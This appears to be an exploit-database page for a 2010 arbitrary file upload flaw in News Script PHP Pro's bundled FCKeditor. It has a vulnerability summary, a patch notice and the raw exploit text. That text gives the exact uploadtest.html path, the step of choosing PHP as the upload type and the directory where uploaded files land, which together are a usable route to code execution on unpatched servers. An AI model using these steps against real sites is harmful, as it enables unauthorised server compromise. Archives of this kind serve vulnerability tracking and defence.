header-logo
Suggest Exploit
vendor:
News Script PHP Pro
by:
Net.Edit0r
7,5
CVSS
HIGH
File Upload Vulnerability
434
CWE
Product Name: News Script PHP Pro
Affected Version From: Full Version
Affected Version To: Full Version
Patch Exists: YES
Related CWE: Web Applications
CPE: newsscriptphp.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: linux/php
2010

News Script PHP Pro (fckeditor) File Upload Vulnerability

A vulnerability in News Script PHP Pro (fckeditor) allows an attacker to upload arbitrary files to the server. The vulnerability exists due to insufficient validation of the file type in the 'uploadtest.html' script. An attacker can upload a malicious file to the server and execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the application to the latest version.
Source

Exploit-DB raw data:

                                
==============================================================================
  
        [»] News Script PHP Pro (fckeditor) File Upload Vulnerability
  
==============================================================================
  
    [»] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]
  
    [»] Script  :           [ News Script PHP Pro  ]
  
    [»] TestedON:           [ linux/php ]
  
    [»] Download:           [ http://newsscriptphp.com/ ]
  
    [»] Author  :           [ Net.Edit0r }
  
    [»] Email   :           [ black.hat.tm@gmail.com ]
  
    [»] Date    :           [ 2010-12-26 ]
   
    [»] Version :           [ Full Version ]

    [»] CVE     :           [Web Applications]
  
###########################################################################
  
     
===[ Exploit ]===    ./Iranian HackerZ
  
  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  [»] Select the "File Upload" To use = php
 
===[ Upload To ]===
 
  [»] http://server/[patch]/userfiles/Name File
 
===[ Demo ]===

  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor 
 
     BHG : Net.Edit0r ~ Darkcoder ~ keracker
                                   
###########################################################################

Navigation

Suggest Exploit

Services By CQR